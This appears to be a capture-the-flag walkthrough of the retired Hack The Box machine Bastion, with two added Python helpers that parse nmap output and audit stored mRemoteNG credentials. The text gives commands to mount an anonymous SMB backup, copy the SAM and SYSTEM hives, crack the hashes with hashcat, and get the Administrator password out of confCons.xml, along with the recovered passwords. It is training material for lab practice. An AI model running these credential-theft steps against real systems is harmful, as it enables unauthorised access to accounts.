Hackthebox.eu - Retired - Bastion
Recon
As always I start with just a simple up/down scan on all TCP ports to see what is open.
$ nmap -T4 -p- -oX ./nmapb.xml bastion.htb
Then I convert that to HTML to make it pretty.
That is a lot of open ports. Let's scan again with the -A switch on just the open ports.
$ nmap -T4 -A -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -oX ./nmapf.xml bastion.htb
Then I convert that to HTML too.
$ xsltproc ./nmapf.xml -o ./nmapf.html
So let's look.
Looks like we have a Windows box with OpenSSH on port 22, NetBIOS/SMB on 139/445 and WinRM on the rest of the open ports.
No website to attack... That's different.
Let's see what shares are available.
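As an added example (my own code, not part of the original writeup), here is a small Python parser for the -oX output that pulls out the open ports and groups them into the service classes named above. It gives the same information as the xsltproc HTML, but in a form you can diff between scans or feed into an exposure review. The embedded XML is a constructed, cut-down imitation of nmap's format with a TEST-NET address, not the author's nmapf.xml.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format, imitating (in cut-down form) the kind
# of file the scans above write. The address is a TEST-NET placeholder, not the box.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -p22,135,139,445,5985,47001 bastion.htb">
  <host>
    <status state="up"/>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <hostnames><hostname name="bastion.htb" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="5985"><state state="open"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/></port>
      <port protocol="tcp" portid="47001"><state state="open"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Ports a defender wants called out explicitly on a reachable Windows host.
NOTABLE = {
    22: "ssh", 135: "msrpc", 139: "smb", 445: "smb",
    5985: "winrm", 47001: "winrm", 3389: "rdp",
}


def open_ports(xml_text):
    """Return one dict per open port across all hosts in an nmap XML document."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.findall("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure, skip them
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            found.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": product,
            })
    return found


def exposure_summary(ports):
    """Group open ports by the class of service they expose (smb, winrm, ...)."""
    summary = {}
    for p in ports:
        label = NOTABLE.get(p["port"], "other")
        summary.setdefault(label, []).append(p["port"])
    return {label: sorted(plist) for label, plist in summary.items()}


if __name__ == "__main__":
    found = open_ports(SAMPLE_NMAP_XML)
    for p in found:
        print(f'{p["host"]}:{p["port"]}/{p["proto"]}  {p["service"]:<12} {p["product"]}')
    print(exposure_summary(found))
```

Run it against a real -oX file by reading the file into a string and passing it to open_ports; the summary is what you compare against the list of services that are actually supposed to be reachable.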
$ smbclient -L //bastion.htb -N
Cool, we can see some shares with an anonymous connection.
Let's see if we can connect to any of them. Backups sounds tasty, let's try that first.
Cool
We get a nice note about the VPN link being slow in note.txt:
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Under the Windows image backup there is a folder that looks like the backup for a computer called L4mpje-pc.
Exploit
I started to use mget to download the file but that was going to take forever. That note we found might actually be a hint for us to think of a different way to look at the backup file.
I thought about it for a bit and decided to just mount the share on my local box to look at the files.
I created a folder named mount:
/Desktop/HTB/bastion/mount$ sudo mount -t cifs //bastion.htb/Backups ./ -o user=""
And mounted the share there.
Here is a blog that walks you through the process
Once I had the VHD loaded I poked around for any interesting files and didn't find anything, so I decided to grab the SAM and SYSTEM files to see if we can break the hashes.
These are the Windows equivalent of the passwd and shadow files on Linux systems.
They hold the hashes for the user accounts on a Windows box. Normally they are protected and you can't access them while the machine is running, but they are easy to copy out of a VHD.
You can get them from the \windows\system32\config folder.
I just copied them to my working folder on my local machine:
cp ./SAM /home/circusmonkey/Desktop/HTB/bastion/
cp SYSTEM /home/circusmonkey/Desktop/HTB/bastion/
I then used samdump2 to write them to another file; this process is similar to combining the passwd and shadow files before you throw them at your favorite cracker.
$ samdump2 SYSTEM SAM > hashes.txt
I chose hashcat to try and break the hash:
$ hashcat -m 1000 -a 0 /home/circusmonkey/Desktop/HTB/bastion/hash.txt /home/circusmonkey/rockyou.txt --force
Pretty quickly we got this result:
bureaulampje
Cool, so:
username: l4mpje
Password: bureaulampje
Let's see if we can SSH in with these creds.
We got a shell!!!
We got the user hash
Doing simple enumeration after this leads us to an installed program called mRemoteNG, which is a tabbed connection manager for RDP, SSH and other protocols.
One of the features it offers is saving credentials. You know, so you don't have to actually type in your password when connecting to services.
The passwords are saved in an XML file called confCons.xml located in the user's AppData\Roaming folder…
I wonder if there is one present on this system?
Good news, everybody!
Let's check it out.
This looks like saved connection credentials for RDP to the local machine as the Administrator account.
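An added Python example (not from the original post or the mRemoteNG project) of the audit a defender can run over a confCons.xml before someone else reads it: list every connection that has a password stored, call out the ones for privileged accounts, and report whether the file relies on per-field encryption only. The XML is a constructed imitation; its element and attribute names follow the mRemoteNG connection-file format as I know it (an assumption to check against your version), and the Password values are placeholders, not ciphertext from the box.

```python
import xml.etree.ElementTree as ET

# Constructed imitation of an mRemoteNG confCons.xml. Attribute names are assumed to
# match the mRemoteNG 1.7x file format; Password values are plain placeholders.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Username="Administrator" Domain=""
        Password="PLACEHOLDER-ciphertext-1" Hostname="127.0.0.1"
        Protocol="RDP" Port="3389" />
  <Node Name="Jump" Type="Connection" Descr="" Username="l4mpje" Domain=""
        Password="" Hostname="127.0.0.1" Protocol="SSH2" Port="22" />
  <Node Name="Servers" Type="Container" Expanded="true">
    <Node Name="FileSrv" Type="Connection" Descr="" Username="svc_backup" Domain="CORP"
          Password="PLACEHOLDER-ciphertext-2" Hostname="fs01.corp.example"
          Protocol="RDP" Port="3389" />
  </Node>
</mrng:Connections>
"""

# Account names that should never sit in a connection manager with a stored password.
PRIVILEGED_NAMES = {"administrator", "admin", "root"}


def saved_credentials(xml_text):
    """List every connection node that carries a stored (non-empty) password."""
    root = ET.fromstring(xml_text)
    found = []
    # Node elements carry no namespace prefix; iter() also descends into Container nodes.
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        user = node.get("Username", "")
        found.append({
            "name": node.get("Name"),
            "user": user,
            "domain": node.get("Domain", ""),
            "host": node.get("Hostname"),
            "protocol": node.get("Protocol"),
            "privileged": user.lower() in PRIVILEGED_NAMES,
        })
    return found


def protection_status(xml_text):
    """Report how the file protects itself: whole-file encryption, or only the password fields."""
    root = ET.fromstring(xml_text)
    return {
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "engine": root.get("EncryptionEngine"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
    }


if __name__ == "__main__":
    for c in saved_credentials(SAMPLE_CONFCONS):
        flag = "PRIVILEGED" if c["privileged"] else ""
        print(f'{c["name"]:<10} {c["user"]:<15} {c["host"]:<18} {c["protocol"]:<5} {flag}')
    print(protection_status(SAMPLE_CONFCONS))
```

The finding that matters is the combination seen on this box: a stored password for a privileged account in a file that any process running as the low-privilege user can read. The fix is a custom master password (or not saving privileged credentials at all), not a different file location.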
I found a bunch of blog posts online about how to try and decrypt this. They all seemed like a lot of work :)
I found another post about how, from the GUI of the program, you can basically just echo out the saved credential. That is the route I'm going to try.
I just need to install the program, copy over the XML, and out should pop the Administrator password.
I had a bunch of errors with the way the XML copied and pasted over to my Windows VM. I had to correct a bunch of added spacing, but eventually I got it to load the XML. I also only copied over the connection for the Administrator RDP session.
Then I created the external tool mentioned in the blog to echo out the password.
Then just a simple right click on the DC entry, External Tools and New External Tool.
Out pops what is most likely the Administrator password:
thXLHM96BeKL0ER2
Yes, it was.
Let's get that hash:
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
9588***********************************
Bye-Bye Everybody